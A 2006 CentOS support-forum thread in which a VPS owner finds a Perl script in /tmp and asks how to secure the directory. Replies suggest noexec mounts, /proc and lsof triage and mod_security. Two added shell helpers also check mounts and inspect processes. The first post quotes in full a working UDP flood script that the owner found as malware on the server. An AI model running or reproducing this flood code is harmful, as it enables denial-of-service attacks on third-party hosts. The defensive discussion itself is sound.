/tmp folder was attacked

Support for security such as Firewalls and securing linux
Dante
Posts: 3
Joined: 2006/09/21 12:21:45

/tmp folder was attacked

Post by Dante » 2006/09/21 12:31:42

Hello

I have a VPS solution running on CentOS 4.3. Yesterday I saw in "top" that some Perl script was overloading my CPU and memory. I killed that process twice, and I found in the /tmp folder a .txt file containing the following code:

[code]#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "Distrugem ip - Flood - Made By Andos\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
[/code]

It seems that it is a flood script.

Questions:

1. How can I protect my /tmp folder to prevent the writing of this kind of file?
2. If the answer to q1 is "a script which can search for and erase malicious scripts", then where can I find something like this?
3. Is it normal to be able to write to the /tmp folder under any conditions, or is it just a hole in my VPS?

If there is someone who can help me, I will always love her/him/it :))))

thanks and best regards

Dante

foxb
Posts: 1924
Joined: 2006/04/20 19:03:33
Location: Montreal/QC

Re: /tmp folder was attacked

Post by foxb » 2006/09/21 13:43:26

First see who did this (ls -l should give you the user name) and warn him/her. Also see which account is running the script.

You need to find a way to stop programs executing from /tmp.

Did you check your system for a backdoor??
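As an added example (not foxb's or the thread's own code), a check for the usual way to stop programs executing from /tmp: mounting the scratch directories with noexec and nosuid. It parses a mount table in /proc/mounts format so it can be run against a constructed sample as well as the live file; the function name check_mount_opts is mine. Keep in mind that noexec only blocks direct execution of a file; an interpreter invoked on a file in /tmp still runs it, so this is one layer on top of fixing the web script that dropped the file.

```shell
#!/bin/sh
# Added example, not from the thread. Verifies that the world-writable
# scratch directories are separate mounts carrying noexec and nosuid.

# check_mount_opts MOUNT_TABLE DIR...
# MOUNT_TABLE is a file in /proc/mounts format (use /proc/mounts on a
# live box). Prints one line per DIR and returns 1 if any DIR is not a
# mount point of its own or lacks noexec or nosuid.
check_mount_opts() {
    table=$1; shift
    rc=0
    for dir in "$@"; do
        # /proc/mounts fields: device mountpoint fstype options dump pass
        opts=$(awk -v d="$dir" '$2 == d { o = $4 } END { print o }' "$table")
        if [ -z "$opts" ]; then
            echo "$dir: not a separate mount (inherits options of its parent)"
            rc=1
            continue
        fi
        missing=""
        for want in noexec nosuid; do
            case ",$opts," in
                *",$want,"*) ;;                 # option present
                *) missing="$missing$want," ;;  # option absent
            esac
        done
        if [ -n "$missing" ]; then
            echo "$dir: MISSING ${missing%,} (options: $opts)"
            rc=1
        else
            echo "$dir: ok ($opts)"
        fi
    done
    return $rc
}

# On the affected host:
#   check_mount_opts /proc/mounts /tmp /var/tmp /dev/shm
# A hardened /etc/fstab entry for a tmpfs-backed /tmp looks like:
#   tmpfs  /tmp  tmpfs  defaults,noexec,nosuid,nodev  0 0
# (mount -o remount,noexec,nosuid /tmp applies it without a reboot)
```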

Dante
Posts: 3
Joined: 2006/09/21 12:21:45

Re: /tmp folder was attacked

Post by Dante » 2006/09/21 13:53:21

Hello

The process is being run by nobody.

How can I see that backdoor?

Regards and thanks

stephan
Posts: 17
Joined: 2006/09/07 01:05:48

Re: /tmp folder was attacked

Post by stephan » 2006/09/21 15:39:59

Hi,

Good places to check for this kind of thing are:

/var/tmp
/tmp
and
/dev/shm

Sometimes it's possible to grab the process number

(from top, or "ps aux|grep whatever")

then type:

cat /proc/Process_number_goes_here/environ

It will sometimes show you how the exploit was done. Checking log files is also a good bet, but sometimes the exploit will have been running for quite a while before you notice.

The most common way I have found that this happens is through a security flaw in a script. What you need to do is check through all your websites and make sure you don't have any outdated ones. You can sign up to the "bugtraq" mailing list at securityfocus.com to get e-mailed about the latest insecure scripts.

1. How can I protect my /tmp folder to prevent the writing of this kind of file?

You can try mounting it so that it's not executable. I haven't done this personally, but if you search the forums something should come up. I'm not sure how effective this is, as some people just put text files and stuff in /tmp, I'm not sure if they run it from there most of the time.

2. If the answer to q1 is "a script which can search for and erase malicious scripts", then where can I find something like this?

I don't know of one :-(

3. Is it normal to be able to write to the /tmp folder under any conditions, or is it just a hole in my VPS?

I think /tmp has to be writeable for storing temporary stuff, but it's probably a hole in a script on a website you are hosting.

I hope that helps.



* Editing just to add: if you do get the process number, you can do:

lsof -p Process_Number

to show what files it's using.
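A defender-side triage helper, added here as an example (it is not stephan's or the thread's own code), that follows the steps above: list interpreter scripts sitting in /tmp, /var/tmp and /dev/shm with their owner via ls -l, then dump a process's command line, working directory, environment and open files from /proc (lsof when it is installed). The function names find_scripts and triage_pid are my own.

```shell
#!/bin/sh
# Added example, not from the thread. Helpers for the triage stephan
# describes: find script files in the world-writable scratch dirs, then
# see how a suspicious process was started via /proc/<pid>.

# find_scripts DIR...: print "ls -l" lines (owner, mtime, path) for every
# regular file whose first two bytes are "#!", i.e. an interpreter script
# whatever its extension (the flood script above was a .txt file).
find_scripts() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f 2>/dev/null | while IFS= read -r f; do
            if [ "$(head -c 2 "$f" 2>/dev/null)" = "#!" ]; then
                ls -l "$f"
            fi
        done
    done
}

# triage_pid PID: owner, full command line, working directory, environment
# (one variable per line; a process spawned by a web CGI usually carries
# REQUEST_URI, HTTP_USER_AGENT and the like, which shows how it got in)
# and open files. Returns 1 if the process does not exist.
triage_pid() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    echo "== owner ==";   ls -ld "/proc/$pid" | awk '{ print $3 }'
    echo "== cmdline =="; tr '\0' ' ' < "/proc/$pid/cmdline"; echo
    echo "== cwd ==";     readlink "/proc/$pid/cwd"
    echo "== environ =="; tr '\0' '\n' < "/proc/$pid/environ"
    echo "== open files =="
    if command -v lsof >/dev/null 2>&1; then
        lsof -p "$pid"
    else
        ls -l "/proc/$pid/fd"   # fallback when lsof is not installed
    fi
}

# Typical use on the affected host:
#   find_scripts /tmp /var/tmp /dev/shm
#   triage_pid "$(pgrep -f perl | head -n 1)"
```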

K_Frye
Posts: 425
Joined: 2005/07/13 01:48:35
Location: Canada

Re: /tmp folder was attacked

Post by K_Frye » 2006/09/26 04:53:48

[quote]
Dante wrote:
Hello

I have a VPS solution running on CentOS 4.3. Yesterday I saw in "top" that some Perl script was overloading my CPU and memory. I killed that process twice, and I found in the /tmp folder a .txt file containing the following code:

Questions:

1. How can I protect my /tmp folder to prevent the writing of this kind of file?
[/quote]

If you're running Apache, consider installing mod_security and using the GotRoot ruleset:

http://www.gotroot.com/mod_security+rules
http://www.gotroot.com/tiki-index.php?page=Setup+of+mod_security
